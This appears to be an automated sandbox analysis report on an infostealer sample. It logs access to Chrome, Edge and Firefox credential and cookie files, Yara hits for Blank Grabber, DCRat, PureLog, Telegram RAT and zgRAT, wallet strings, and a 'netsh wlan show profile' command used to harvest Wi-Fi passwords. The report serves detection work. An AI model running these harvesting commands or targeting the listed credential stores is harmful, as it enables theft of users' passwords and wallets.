Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gl VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hi VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\km VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lo VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe

Code function: 0_2_00007FF7691AC330 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF7691AC330

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe

Code function: 0_2_00007FF7691C518C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF7691C518C

Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe

Code function: 4_2_0092D076 GetVersionExW,

4_2_0092D076

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1736293542.00000202B6EA5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1736293542.00000202B6EA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: based.exe PID: 1700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: based.exe PID: 6900, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI17002\rarreg.key, type: DROPPED

Yara detected DCRat

Source: Yara match

File source: 00000034.00000002.1960895196.000000001341B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 12.3.svchost.exe.5c4e6ea.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.svchost.exe.644e6ea.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.0.ChainComServermonitor.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.svchost.exe.5c4e6ea.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.svchost.exe.644e6ea.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000003.1760108075.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1750025071.000000000773B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1761289490.0000000006400000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000000.1797015711.0000000000AF2000.00000002.00000001.01000000.00000025.sdmp, type: MEMORY
Source: Yara match	File source: C:\Recovery\winlogon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Mozilla Firefox\dwm.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\powershell.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: based.exe PID: 6900, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 12.3.svchost.exe.5c4e6ea.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.svchost.exe.644e6ea.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.0.ChainComServermonitor.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.svchost.exe.5c4e6ea.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.svchost.exe.644e6ea.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Recovery\winlogon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Mozilla Firefox\dwm.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\powershell.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxxz
Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Exodusz
Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: EthereumZ
Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystoreZ

Tries to harvest and steal WLAN passwords

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
